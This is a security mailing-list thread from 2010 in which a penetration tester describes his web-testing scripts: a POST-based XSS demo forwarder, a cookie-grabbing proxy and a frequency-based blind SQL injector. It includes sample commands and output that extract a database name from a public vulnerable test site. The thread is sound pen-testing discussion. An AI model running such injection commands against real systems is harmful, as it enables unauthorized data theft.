Not at all, but let me clean them up a bit first. I have a few small errors to fix then I'll post them to the pdc blog.
-----Original Message----- From: [email protected] [mailto:[email protected]] On Behalf Of Robin Wood Sent: Sunday, September 05, 2010 11:49 AM To: PaulDotCom Security Weekly Mailing List Subject: Re: [Pauldotcom] Misc Web Pen testing scripts Would you mind if I added these to the PenTester Scripting website http://www.pentesterscripting.com/ ? Robin On 3 September 2010 17:31, Baggett, Mark <[email protected]> wrote: > I'm trying to learn python. Userpass.py was my first python script. > (http://pauldotcom.com/2010/08/draft---creating-per-user-cust.html) > Eventually, I am going to write something that doesn't completely suck. > There scripts are still a work in progress. Send me comments and > suggestion off list. I hope they are useful. If you find errors > before I post these to the blog I'd appreciate a heads up. > > Thanks > Mark Baggett > > 1)get2post.py > Use to demonstrate POST based XSS attacks to a customer. Put get2post > on a single host then you can create URL's with the POST values for > the customer. Same functionality as > http://www.whiteacid.org/misc/xss_post_forwarder.php but on your own > server so you are not disclosing a customers XSS issues to a third > party. > > 2)p0wnpr0xy.py > Grabs URL's & cookies as you browse and launches the tool of choice. > Here is a demo video http://www.vimeo.com/14667308 > > 3)sqlinjector.py > This is a MySQL blind SQL injector that uses a much different SQL > injection technique. Instead of repeatedly cutting the alphabet in > half or brute forcing the letters it uses a per letter frequency table > to predict the next letter. For example, if you have a Q there is a > HIGH probability that the next letter is a U. The technique is > discussed and outlined here: > http://www.exploit-db.com/papers/13696/ 47 fewer guesses than > bsqlbf.pl! 79 vs 126 > > I implemented this technique in python. You give the script a > vulnerable URL, and you put your SQL query in the URL with carets as > markers at the point on injection. This syntax enables flexible url > endings. > > mark.baggett$ $ python sqlinjector.py > "http://testphp.vulnweb.com/listproducts.php?cat=1^database()^#" > a > ac > acu > acua > acuar > acuart > end of word found > Found target acuart in 79 guesses. > mtcexcp007:misc mark.baggett$ > > mark.baggett$ perl bsqlbf.pl -blind cat -sql "database()" -url > http://testphp.vulnweb.com/listproducts.php?cat=1 > > // Blind SQL injection brute force. > // [email protected] / http://www.514.es > > <truncated> > trying: acuart#### results: > database() = acuart > total hits: 126 > > > > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > _______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com _______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
